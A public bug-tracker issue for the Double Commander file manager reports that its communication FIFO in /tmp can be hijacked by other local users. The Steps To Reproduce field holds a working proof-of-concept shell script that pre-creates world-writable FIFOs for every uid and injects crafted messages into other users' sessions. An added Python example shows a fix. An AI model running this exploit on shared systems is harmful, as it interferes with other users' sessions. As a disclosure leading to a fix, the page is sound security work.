View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0002276 | Double Commander | Default | public | 2019-04-05 10:29 | 2021-10-29 23:21 |
Reporter | ginggs | Assigned To | Alexx2000 | ||
Priority | normal | Severity | major | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Projection | none | ETA | none | ||
Platform | Linux | OS | Debian | OS Version | 10 |
Product Version | 0.9.1 | Product Build | 8649 | ||
Target Version | 0.9.3 | Fixed in Version | 0.9.3 | ||
Summary | 0002276: insecure use of /tmp | ||||
Description | From: https://bugs.debian.org/926223 Double Commander uses /tmp/doublecmd--<uid> for communication, even when this file is owned by another user. A local attacker could exploit this to load paths into other users' panels. A proof-of-concept exploit is attached. Please move the communication pipe out of /tmp. | ||||
Steps To Reproduce |

```sh
#!/bin/sh
set -e -u
cd /tmp
getent passwd | while IFS=: read -r user _ uid _
do
    fifo="doublecmd--$uid"
    rm -f "$fifo" || true # maybe stale fifo from the previous exploit run?
    if ! mkfifo -m 666 "$fifo"
    then
        printf 'Failed to mount the exploit against %s; Maybe try again later?\n' "$user"
        continue
    fi
done
while true
do
    for uid in $(ps --no-headers -C doublecmd -o uid)
    do
        sleep 1
        fifo="doublecmd--$uid"
        path=$(find /bin /sbin /usr/bin /usr/sbin /usr/games | shuf -n 1)
        len=${#path}
        pad=$((1024-len))
        {
            printf '\1\5\20\0\0\5\20\0\0\0\1%02050d' | tr '0' '\0'
            printf '%s' "$path"
            printf "%0${pad}d\1%01024d" | tr '0' '\0'
        } > "$fifo"
    done
    sleep 1
done
```
Tags | No tags attached. | ||||
Fixed in Revision | 8778-8780, 8783, 8796-8797, 8803 | ||||
Operating system | Linux | ||||
Widgetset | GTK2, Qt5 | ||||
Architecture | 32-bit, 64-bit | ||||
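
One way to act on the report's request, as an added example (not Double Commander's code and not its actual fix): keep the pipe in a private per-user directory and check type, owner and mode on the opened descriptor before reading from it. The names `open_ipc_fifo`, `check_private` and `UnsafeIpcPath`, and the use of a directory such as `$XDG_RUNTIME_DIR` as `base_dir`, are assumptions of this example.

```python
import os
import stat


class UnsafeIpcPath(OSError):
    """Raised when the IPC directory or FIFO cannot be trusted."""


def check_private(st, want_uid, is_type, what):
    """Reject objects of the wrong type or owner, or with group/other access."""
    if not is_type(st.st_mode):
        raise UnsafeIpcPath(f"{what}: unexpected file type")
    if st.st_uid != want_uid:
        raise UnsafeIpcPath(f"{what}: owned by uid {st.st_uid}, expected {want_uid}")
    if st.st_mode & 0o077:
        raise UnsafeIpcPath(f"{what}: accessible to group/other")


def open_ipc_fifo(base_dir, name, uid=None):
    """Create (if needed) and open base_dir/name as a FIFO only this uid can use.

    base_dir is assumed to be a per-user directory (e.g. $XDG_RUNTIME_DIR),
    not a shared one like /tmp. Returns a read-only, non-blocking descriptor.
    """
    uid = os.getuid() if uid is None else uid
    # The directory must be ours and private; otherwise another user could
    # pre-create or replace the FIFO, which is the problem reported above.
    check_private(os.lstat(base_dir), uid, stat.S_ISDIR, base_dir)
    path = os.path.join(base_dir, name)
    try:
        os.mkfifo(path, 0o600)
    except FileExistsError:
        pass  # a pre-existing object is validated below, never trusted blindly
    # O_NOFOLLOW refuses a symlink (OSError, ELOOP); O_NONBLOCK keeps the open
    # from hanging on a FIFO that has no writer yet.
    fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK | os.O_NOFOLLOW)
    try:
        # fstat the descriptor, not the path: the check then applies to the
        # object that was actually opened.
        check_private(os.fstat(fd), uid, stat.S_ISFIFO, path)
    except UnsafeIpcPath:
        os.close(fd)
        raise
    return fd
```
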
|
I am not sure that it's a bug; as I understood, it's the Unix filesystem specification. But maybe I found a bug:

```
$: mkdir -p ~/.local/bin && mkdir -p ~/.local/tmp && cd ~/.local/bin
$: echo $'#!/bin/sh\n\nexport TMPDIR=$HOME/.local/tmp\nexec /usr/bin/doublecmd "$@"' > doublecmd
$: chmod 755 ./doublecmd
$: ./doublecmd
```

(~/.local/bin is in my PATH by default) but it doesn't work, DC uses /tmp/_dcXXXXXX/ instead of $HOME/.local/tmp/_dcXXXXXX. Why? It's strange, as I see GetTempDir tries to get the TMPDIR value before getting /tmp, and in this case TMPDIR is not empty.

P.S. I think it can be a good question for the FAQ.
|
> but it doesn't work, DC uses /tmp/_dcXXXXXX/ instead of $HOME/.local/tmp/_dcXXXXXX.

It seems it works fine now.
Date Modified | Username | Field | Change |
---|---|---|---|
2019-04-05 10:29 | ginggs | New Issue | |
2019-04-05 14:30 | Skif_off | Note Added: 0003129 | |
2019-04-05 14:32 | Skif_off | Note Edited: 0003129 | |
2019-04-05 14:33 | Skif_off | Note Edited: 0003129 | |
2019-04-05 19:38 | Skif_off | Note Edited: 0003129 | |
2019-04-06 21:42 | Alexx2000 | Fixed in Revision | => 8778-8779 |
2019-04-06 21:42 | Alexx2000 | Assigned To | => Alexx2000 |
2019-04-06 21:42 | Alexx2000 | Status | new => resolved |
2019-04-06 21:42 | Alexx2000 | Resolution | open => fixed |
2019-04-06 21:42 | Alexx2000 | Target Version | => 0.9.3 |
2019-04-06 21:50 | Alexx2000 | Fixed in Revision | 8778-8779 => 8778-8780 |
2019-04-14 19:00 | Alexx2000 | Fixed in Revision | 8778-8780 => 8778-8780, 8783 |
2019-04-16 18:50 | Skif_off | Note Added: 0003133 | |
2019-05-03 22:31 | Alexx2000 | Fixed in Revision | 8778-8780, 8783 => 8778-8780, 8783, 8796 |
2019-05-03 22:57 | Alexx2000 | Fixed in Revision | 8778-8780, 8783, 8796 => 8778-8780, 8783, 8796-8797 |
2019-05-05 18:38 | Alexx2000 | Fixed in Revision | 8778-8780, 8783, 8796-8797 => 8778-8780, 8783, 8796-8797, 8803 |
2019-05-05 18:38 | Alexx2000 | Fixed in Version | => 0.9.3 |
2021-10-29 23:21 | Alexx2000 | Status | resolved => closed |